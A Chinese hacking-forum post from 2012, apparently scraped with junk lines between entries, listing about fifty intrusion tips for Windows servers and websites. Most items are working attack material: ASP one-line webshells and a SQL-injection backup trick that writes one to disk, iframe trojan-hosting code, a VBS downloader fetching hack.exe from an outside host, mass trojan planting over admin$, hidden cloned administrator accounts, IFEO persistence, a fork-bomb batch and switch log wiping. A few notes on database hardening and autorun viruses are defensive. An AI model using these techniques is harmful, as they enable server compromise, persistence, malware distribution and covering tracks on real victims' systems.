中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
; b* k) ^- d* o
cacls C:\windows\system32 /G hqw20:R
0 x. W+ ~& @8 U4 K6 C* x
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
$ ^8 l# h6 y, O6 U1 k
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
2 q/ n& ]$ q# g
+ \+ G/ E0 G7 e8 o
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
V& m0 C* S' o; P
' t; Y' K/ e# k. y2 m* H6 O
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
. [6 ?% q% I8 D& @7 i8 J& @+ u7 e& w( o
& P, @4 ^9 S: J1 I
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# P8 ~! L+ Z' W& Q- T2 i
; e, q- Q+ j1 {9 M" z: D2 |
5、利用INF文件来修改注册表
$ @ Z. I7 N& y) s
[Version]
5 B' G4 l1 y( b& L: n5 a
Signature="$CHICAGO$"
, _+ N/ @1 B* y
[Defaultinstall]
7 s3 e" c: Y/ r# r- E
addREG=Ating
. R* h8 D! K! x3 x
[Ating]
5 c |& L, b/ H- k4 _. q8 j) t
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. A6 K7 y, y5 _$ k7 r$ ]
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
2 A. {. i. Y! I0 p' D
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
+ j1 e) ~" {" I
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- u! A2 d" @* s7 W9 L' r5 X
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
) k: ~3 i3 t# K
HKEY_CURRENT_CONFIG 简写为 HKCC
1 W' ?) w! J# J* U& F
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
& ? l0 e% _3 A9 i; n2 O8 s2 X
"1"这里代表是写入或删除注册表键值中的具体数据
2 o5 X1 {! [# n( c: D- [
; p+ ?* ~) m9 t( [1 o
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
) z# Z8 Q. y% `: \/ I
多了一步就是在防火墙里添加个端口,然后导出其键值
- j3 u. H1 r3 ~' y" b; W0 m8 e
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
' f, L& a [" L, s _5 C
5 [ \; m& y i/ R' o; l4 U" m; b
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; h i) |/ a6 Q
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
; d1 a3 ?9 R! L& p3 ~ W
3 a* S; |9 N3 r, P) {/ W
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
4 I' M& x. q9 k/ l& b2 P
) U6 P$ e" I- Q
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
+ r/ P/ [& a8 I( a+ k$ ]
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
2 Y, K* V* d* ?5 h
) t- N& w2 D: \4 ~
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
% |& C' L- Z% _" P- v: @
- d* K6 K1 g' s8 z5 M$ }; y
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
- A) U) _5 Y7 O8 H
用法:xsniff –pass –hide –log pass.txt
* a) g; t' \( x3 Y9 o6 l: X' y: |( v
; F- f- |+ K) j1 m6 A' P: s
12、google搜索的艺术
& A8 [ A- ]' y% F8 U
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ B! U; h. c: I% [: M) W
或“字符串的语法错误”可以找到很多sql注入漏洞。
, O0 o+ p: E5 Y$ l* |
/ Y% U7 F! }2 u- q# M
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
& C5 L" ~0 V( {% T# k/ X4 l/ v
; I4 i, o6 |1 G" M
14、cmd中输入 nc –vv –l –p 1987
# i9 K L: t g" C
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
9 q0 X' e7 U6 T$ n2 Z( I
) @8 v0 o& k; R; D+ ^, c2 c
15、制作T++木马,先写个ating.hta文件,内容为
+ `+ W( k: `' V- a
<script language="VBScript">
3 G! N, y% {. V. ^% ?
set wshshell=createobject ("wscript.shell" )
, Z9 x. V( n7 @8 J
a=wshshell.run("你马的名称",1)
+ y/ @) F6 R3 g5 f9 y
window.close
1 F) ]7 ]: A* T! }
</script>
: C6 N, Z) `4 [
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
! [& q7 ]/ f% a0 @4 w
2 U9 o; J" K; s: N7 ?/ p/ m
16、搜索栏里输入
( e z4 b! q8 @
关键字%'and 1=1 and '%'='
/ E" ^) h+ G# D2 r3 J
关键字%'and 1=2 and '%'='
2 p- i/ M' p/ w5 F" r) U
比较不同处 可以作为注入的特征字符
- y4 B8 K6 L+ a. [+ @: ]. O
?5 L, }. n) j9 \- U
17、挂马代码<html>
! u7 G5 H/ t) k5 N/ [
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
5 w$ g* z. L- \6 b) c* s
</html>
0 J5 \' J5 P& R& }4 a& ~
9 w' o/ Y9 D/ {0 [5 X6 {9 ~0 A
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
$ |, D/ D+ T2 ?+ |# A* ?
net localgroup administrators还是可以看出Guest是管理员来。
, {8 [# @$ W* E' Z, {- A/ A5 r- m
/ z. E5 }: X4 t
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
C) h4 `5 D' s5 i) @! J
用法: 安装: instsrv.exe 服务名称 路径
0 b9 u. A% A5 ~0 y; n) e5 E
卸载: instsrv.exe 服务名称 REMOVE
; i% B7 Y9 j$ m* z
8 d6 B' W6 [; A0 V; d. {; F0 S
9 X2 S) ^/ [$ N$ N% B1 A: R: q
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
, W- R8 j- c" {2 y; L- l; g
不能注入时要第一时间想到%5c暴库。
) h# w: a9 s4 a$ _4 w1 v, y. ~
) m7 Z3 c0 D' [6 r
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. t6 t( Z4 Y0 N4 p5 s& X7 R, ~
, e, ]4 b4 @, d) E! o
23、缺少xp_cmdshell时
0 s0 q& f4 s: a: H6 k5 ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
8 W3 L8 q- U( {! D) r# s1 T
假如恢复不成功,可以尝试直接加用户(针对开3389的)
3 S/ y+ b& o! J1 [! [
declare @o int
& W4 ]/ ]/ [0 x4 R
exec sp_oacreate 'wscript.shell',@o out
% `6 k' w5 W& k# Y( Z1 z
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 M& T" {, O' @$ V
- t; S! v% K" h- l% {; i* F- R v
24.批量种植木马.bat
5 h8 B2 G2 _* w/ z' A7 V& V
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ ^1 d! \) o1 G* E
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
2 o3 D2 c: {& d
扫描地址.txt里每个主机名一行 用\\开头
" Y3 n$ k( G0 n6 V2 }) [
& }8 h W3 X. M" V7 C1 J
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
( A; G- O: {- q( N
4 P" s% Y3 t, ~$ K5 \
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
$ Q+ z9 ~$ H- w) E' b& S
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
& n0 Z2 Q( w1 A8 b4 u
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
3 \# C- h6 G A+ d
; l% C1 A8 N( M) t% I9 }
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
' {' O$ v8 g/ t7 S6 e; n |8 n& p; L
然后用#clear logg和#clear line vty *删除日志
2 D& l$ ^$ x% E7 ?9 g q* S# D: { S
: T7 y4 L9 w: l) M
28、电脑坏了省去重新安装系统的方法
0 s8 i8 W' L8 L
纯dos下执行,
* p B+ Q W' x9 A
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
- t% V: g& b) ^2 @- x) G7 C
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
- ]6 q- P Z5 g* b$ p
7 g. p1 x* i$ l
29、解决TCP/IP筛选 在注册表里有三处,分别是:
O! P1 q; J& ]8 V
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
# F( \0 T8 p, x
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
9 M# Q. f8 k/ H. ~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" J3 F- v& N6 s9 ?
分别用
4 {+ z2 Q6 ~/ D6 `4 j" H: x5 v
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 R% I( Q: D2 R! g1 T
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' S: }# ^4 n8 R% ^, Z7 e3 b( Q8 H/ k
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' Q4 k$ m S' E& `# t! X( _% I+ W
命令来导出注册表项
+ q$ @* g* `: I2 h& [1 J
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
# R& [1 A# A/ i" c% y" q
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
' [9 g b3 h0 s- { o A; H
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
" t/ E' {! z2 L8 n3 {
/ S* `: W% v+ C9 v1 W E
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
- l. f1 u6 ~+ o1 A
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 e" j! H- d/ r+ C# r* j' t& c1 x
8 Y& `3 m( r; a0 \$ k5 x
31、全手工打造开3389工具
1 }+ d) Z1 Z$ I1 v$ @
打开记事本,编辑内容如下:
` l8 [+ T5 x! A9 H
echo [Components] > c:\sql
6 O2 P x8 v3 x+ ]
echo TSEnable = on >> c:\sql
4 m0 j. g0 K1 {
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
0 M4 g3 }/ m) n" e& c$ [
编辑好后存为BAT文件,上传至肉鸡,执行
* X$ ]: Y2 C9 ]. {- _& O( _" C
1 f# X+ u5 l5 p5 U" Q! w S
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
5 b; R; r5 W3 O, W& ^# i; {
+ ^7 j8 h. ]7 s6 i
33、让服务器重启
( Q1 B& o' T9 L. K
写个bat死循环:
. v) M5 R* {' V6 n: d; x
@echo off
: f9 w, H- ?7 _ } Z' X# l
:loop1
1 h* Q, {+ v# w9 o2 q8 S; O9 E
cls
% c$ V# d# ^9 ]
start cmd.exe
( q. y4 d% C# Z& V9 Z. d
goto loop1
. N( D% H' F& T7 m9 I
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
2 g. \& O. R: Y1 _) m
0 L1 [. x* { t0 x D$ S
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
3 R, s" ~+ G3 e
@echo off
9 N! F$ b! W+ e+ u- j! j y, I
date /t >c:/3389.txt
2 a, |3 B8 Z2 N' R! t. m5 I
time /t >>c:/3389.txt
) {6 y+ h$ o. Y1 a
attrib +s +h c:/3389.bat
. }# V' `( r5 e9 m
attrib +s +h c:/3389.txt
% A) H. J5 [& p; L7 a8 K
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: ~8 G4 f! o: h7 t0 n: L- c2 P9 Y; f
并保存为3389.bat
: ]' W6 r V9 }2 Q# `) g
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
4 o; v2 r% o& K: e$ |( b- b* @$ t* q
! K ] \* @4 ]4 Y# X7 w2 A8 H
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
+ M* B/ b4 C/ v# A2 K
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
0 G0 K+ s4 O% G5 y- C2 g
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
`% v$ i0 L6 R$ S8 v0 I. N
6 N, t; F9 L- C" w5 w
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) y, `9 k: q- ?4 }! E+ [
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 E0 s2 |# N4 c
echo 你的FTP账号 >>c:\1.bat //输入账号
% }- B2 l+ a d2 o
echo 你的FTP密码 >>c:\1.bat //输入密码
, u, J% o, S: j" D3 c$ I3 C4 k6 Y
echo bin >>c:\1.bat //登入
& P! C1 z, s: _" W9 D+ [& h
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
+ x- a6 p0 X# q W0 }# k
echo bye >>c:\1.bat //退出
' j* }: R. k! J
然后执行ftp -s:c:\1.bat即可
7 v) B/ T" m9 X- j( `
4 }8 ]" A- E* Z, h' d) D5 C6 s
37、修改注册表开3389两法
+ l2 M: G$ `6 y. `+ [2 o3 P
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
1 N0 f$ b, i+ [
echo Windows Registry Editor Version 5.00 >>3389.reg
4 H% W9 V2 \2 @/ g1 H0 j9 K# R, W
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
^5 t7 R* k8 _8 J% X
echo "Enabled"="0" >>3389.reg
{' K' i( u! ] ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
( \+ {& Y& n! O/ J& K x( a
NT\CurrentVersion\Winlogon] >>3389.reg
1 y" m) A8 K5 Q: l
echo "ShutdownWithoutLogon"="0" >>3389.reg
. x- O# p9 S: S* A# P4 U' T
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
$ u/ D- \4 F' Z. K0 d2 b7 u- m/ Z
>>3389.reg
" O% s$ x! U$ z% r1 @
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
& ?- q5 `2 i7 G% h8 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
; V: C9 u7 i6 a$ S9 e8 C! H3 t
>>3389.reg
) ?8 P) A* _3 @3 h) a& v
echo "TSEnabled"=dword:00000001 >>3389.reg
8 s: O+ F; B' H# R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
% h, I6 I) G7 R& `
echo "Start"=dword:00000002 >>3389.reg
0 ^% e" N& ~0 z; F' z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
( S6 i( w( O# J
>>3389.reg
1 E! j& K5 x" n7 }+ h R; @9 H/ W
echo "Start"=dword:00000002 >>3389.reg
" j/ `; g7 a. Q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
2 b$ |% {# A- q+ R
echo "Hotkey"="1" >>3389.reg
, }2 W, f9 T0 e2 f- ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 a9 X. J& J; }8 I c3 X" y2 T$ G
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
3 Q' Z* u# m( x1 v4 s
echo "PortNumber"=dword:00000D3D >>3389.reg
) x2 n. j2 X: S1 V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! P, Z; X! I: h* K/ w2 T; A
Server\WinStations\RDP-Tcp] >>3389.reg
& L: C4 L2 V3 S1 y$ l
echo "PortNumber"=dword:00000D3D >>3389.reg
3 Q5 @" s) x5 F6 V) W) f# Y
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
* }7 U) T& R$ i* C3 c4 t
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- G9 q' e6 X% K3 I; K# a1 T& r
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
8 ^, c( N3 K8 v& S1 K
(2)winxp和win2003终端开启
1 p3 c i& j! k+ b
用以下ECHO代码写一个REG文件:
$ @3 A5 s5 z3 Y# w* c+ l
echo Windows Registry Editor Version 5.00>>3389.reg
2 @& e) m4 `) v1 U) m: g/ }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 k) T9 \+ v4 G2 `& Z7 o
Server]>>3389.reg
( b' p% e7 b1 H& ^1 a& v
echo "fDenyTSConnections"=dword:00000000>>3389.reg
: _7 \) [4 j `. }: O) P. V2 i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 V7 v( `8 m! M2 ~( [
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
/ x" s3 {+ [7 ]4 s; @6 J
echo "PortNumber"=dword:00000d3d>>3389.reg
( S F% S Q: b; g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# u3 r% N. P- o4 V6 ^
Server\WinStations\RDP-Tcp]>>3389.reg
2 j8 b0 m# q6 H$ l J; P8 _
echo "PortNumber"=dword:00000d3d>>3389.reg
$ {4 ]2 k, }6 T; Z9 s
然后regedit /s 3389.reg del 3389.reg
9 Y- N; Y* W( N# ~
XP下不论开终端还是改终端端口都不需重启
2 g* p" T+ j, c
# z; s- E1 K! X. R7 ^! e0 t3 r0 e1 F6 U
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
2 Y6 @5 d# _# u0 Y" h* K
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
0 H1 B' b1 n% z+ a+ f
/ g, E1 \2 ^' _+ ~4 d9 x
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
9 r; M8 m# X" h1 u2 g9 @
(1)数据库文件名应复杂并要有特殊字符
9 Y4 H7 N+ i! D. B
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# G- j2 o! g- R# U
将conn.asp文档中的
4 P9 U+ {+ e: Y$ G3 D7 V
DBPath = Server.MapPath("数据库.mdb")
( o- T& \4 i) @/ P/ g
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
6 ^5 ]# c9 g; u0 n" W; L8 ]
3 Z) ^2 Z. u% K8 v3 q2 r& Q! P
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
, ^ ]( |0 C! J# b I
(3)不放在WEB目录里
3 a" ^- w$ ?# `5 d5 U
! H7 h, G8 D, V9 Z- w" X
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
: W0 S$ _+ P1 K- L) {
可以写两个bat文件
* k7 f, D0 Q' s. d1 {
@echo off
0 U, Q! f5 P/ j" h7 ]: y- p
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
" g9 _1 e& n; d/ c' [+ u2 g
@del c:\winnt\system32\query.exe
7 \/ ^* W6 @2 R+ P7 ]. m) @0 X
@del %SYSTEMROOT%\system32\dllcache\query.exe
: Q* m4 r g' G+ L
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
" U5 t6 t/ n% u; ^" Z
- F( Y* m9 x4 ?# Q3 A1 M* N) h
@echo off
7 i2 c$ O* i A) S2 y" o
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
# x! {' w& c, S4 K6 v& n- e. p
@del c:\winnt\system32\tsadmin.exe
. J0 f9 o3 o" i8 L- n
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 D* W) B0 c# X/ h
; { n4 l% P2 L) E
41、映射对方盘符
" O! N; F& d2 n
telnet到他的机器上,
# r' i! ?& X6 |% w0 F4 ~* v* o+ m
net share 查看有没有默认共享 如果没有,那么就接着运行
: u% ?$ ]& A- v2 x
net share c$=c:
# Q/ v4 N$ k. |$ F; r# @; \! q
net share现在有c$
( C5 t3 [% A6 ?/ G3 X
在自己的机器上运行
4 C+ t( [1 `& {9 o
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 s U8 X0 c. ]8 f$ G5 B8 V3 N
/ I5 a- o4 q: q
42、一些很有用的老知识
; V0 p! x, ?5 q7 d8 r
type c:\boot.ini ( 查看系统版本 )
& B7 H; K1 S8 N& u* r& F
net start (查看已经启动的服务)
; v( K& A. ~) X' R
query user ( 查看当前终端连接 )
0 `6 {+ C9 p& r6 \/ r( \
net user ( 查看当前用户 )
& k7 i" p' S# y+ u7 N- F0 K+ [, g
net user 用户 密码/add ( 建立账号 )
. Y3 K, y7 ? `6 L" w2 E, j6 ^, \
net localgroup administrators 用户 /add (提升某用户为管理员)
' S" P# A$ F+ v" B! `
ipconfig -all ( 查看IP什么的 )
5 z4 ]1 r a' F0 K7 W2 P5 l
netstat -an ( 查看当前网络状态 )
! X8 D z0 a9 Q- {8 z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
% i u2 E( [9 B
克隆时Administrator对应1F4
6 B3 g3 L5 f, e! s# i
guest对应1F5
0 U8 q/ u- k0 e! |" l% ~- g2 ?. F
tsinternetuser对应3E8
( A: F, v" [' v
; t) d, e3 k" Z$ N7 Q# Z8 W
43、如果对方没开3389,但是装了Remote Administrator Service
* e4 F1 [/ o9 q, i5 a: |' l
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ S3 W o9 K8 H
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 J$ e* o) f. l
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
4 c/ V/ [: ]4 l3 a# n) @6 F8 [; ?
5 V, _( x: X; d% b+ `8 d
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
* m( M2 f) n1 E
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
( l. y- A, E$ \2 X
5 u5 @& ^! N% S4 I- {
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
+ C. _4 s: N* G+ C
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
/ {7 r% {" v3 P, b
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
% V% \9 P- D- c' x8 } g& ^
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1 n t6 T- K* S3 C$ L
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
3 K6 V& E9 \1 l
(这是完整的一句话,其中没有换行符)
4 ?$ f; H) B9 T# t. @: k8 t3 O t
然后下载:
. B d: ^( i* J
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
8 o* l8 `! m/ i2 t" P9 A
- Q; }4 K6 w4 H ~! [: j; x! g4 z
46、一句话木马成功依赖于两个条件:
% W2 t K& ?! _; H, I- U
1、服务端没有禁止adodb.Stream或FSO组件
* ~9 t& |7 `: i! b0 O
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
n' _, Y, C( \# b* b
0 S, s& S2 j. O8 d3 p( q3 w( {# ?; }
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
c7 ~# C) u0 T. l3 h7 u! `
;alter database utsz set RECOVERY FULL--
5 i" a# b' C& u8 t8 |' X$ F0 q
;create table cmd (a image)--
! y6 Q5 p7 j+ e( \+ p4 D
;backup log utsz to disk = 'D:\cmd' with init--
, b7 f2 x8 ~- n( b* m5 }
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* |+ K, W9 f; I9 O
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
6 [4 w2 p! x! j ^) L7 ]2 Z
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
4 B. C0 A6 X& e+ [- }
; n: G' ~% W8 n/ A
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) F C U+ e4 E9 k/ J# U
3 b$ z" n/ U, g9 U' h+ ]7 {1 O
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
$ I0 G$ ?6 {* C! m5 m
所有会话用 'all'。
. Y( K, f# y" V5 o6 \$ }
-s sessionid 列出会话的信息。
$ a* R" m' @% @8 X; x0 q
-k sessionid 终止会话。
5 s( t% n7 N4 Z' \; k9 D7 K
-m sessionid 发送消息到会话。
6 X7 R2 J D# D( o0 B
& g0 F! N& ?, e! S% K$ I* J. k
config 配置 telnet 服务器参数。
7 V% j& X k4 I! N7 T% O
( E: H+ M* ~$ P% V2 d
common_options 为:
9 `8 H+ {1 ~0 b& m Z- L/ F
-u user 指定要使用其凭据的用户
* @+ P* a+ Q1 S, C! L4 ]
-p password 用户密码
" ] i: N: {; x$ O
# ?& g% V/ |% R5 |5 J7 A, U2 U! z
config_options 为:
. `$ w# c, Q2 p
dom = domain 设定用户的默认域
8 \8 A2 {* [( W- e1 ]6 ^' j6 r
ctrlakeymap = yes|no 设定 ALT 键的映射
" w5 L) D/ f Y2 Y4 |8 }' U
timeout = hh:mm:ss 设定空闲会话超时值
: I c9 F7 f+ I. m- I$ C4 j
timeoutactive = yes|no 启用空闲会话。
$ h) j3 e6 V3 X+ g
maxfail = attempts 设定断开前失败的登录企图数。
$ \: T" O1 I1 M4 A- \7 {: ^
maxconn = connections 设定最大连接数。
3 Q; D- a ^* D8 }' l, w Y4 c4 r
port = number 设定 telnet 端口。
8 _7 u% o( M4 k
sec = [+/-]NTLM [+/-]passwd
/ x. W& t9 J& N- h1 \/ Z9 t
设定身份验证机构
1 u; w6 l6 [* r
fname = file 指定审计文件名。
' G4 F: u I0 p1 p" T! t1 h4 M$ D
fsize = size 指定审计文件的最大尺寸(MB)。
) `, p5 X, P3 L8 n0 f
mode = console|stream 指定操作模式。
3 B( b" i3 v( c a& {$ i2 }+ p# X
auditlocation = eventlog|file|both
7 [+ v7 e5 |( a& V% ?
指定记录地点
5 q8 k! D/ W+ ?$ N* u
audit = [+/-]user [+/-]fail [+/-]admin
{1 K- f, M5 [9 t; E
8 z( V2 A" K9 D% b& S
49、例如:在IE上访问:
1 e1 B+ m+ Z0 F. h0 g! M% V
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
/ Z) E$ o, W/ k/ G5 l
hack.txt里面的代码是:
! O2 t& s3 R* T( j
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
* t& J5 |. K q/ K
把这个hack.txt发到你空间就可以了!
4 w5 @. h/ G, [
这个可以利用来做网马哦!
. j0 y7 I/ V' n, s! P% B
9 a4 w5 t* u" V+ M9 S. u6 e
50、autorun的病毒可以通过手动限制!
; V$ ?- I7 u) ~: ?$ Q" x7 _- C
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
: w/ w( R1 Q; S
2,打开盘符用右键打开!切忌双击盘符~
4 C- t: P5 `9 e) a& G
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
( l" I- |# j/ B; [7 M; X4 b
4 n' u: H* z/ z9 R
51、log备份时的一句话木马:
. V/ P, {" n( m# `+ k
a).<%%25Execute(request("go"))%%25>
) U$ C R" J4 x4 j6 t' f
b).<%Execute(request("go"))%>
9 w% B4 L' }: N1 h0 V
c).%><%execute request("go")%><%
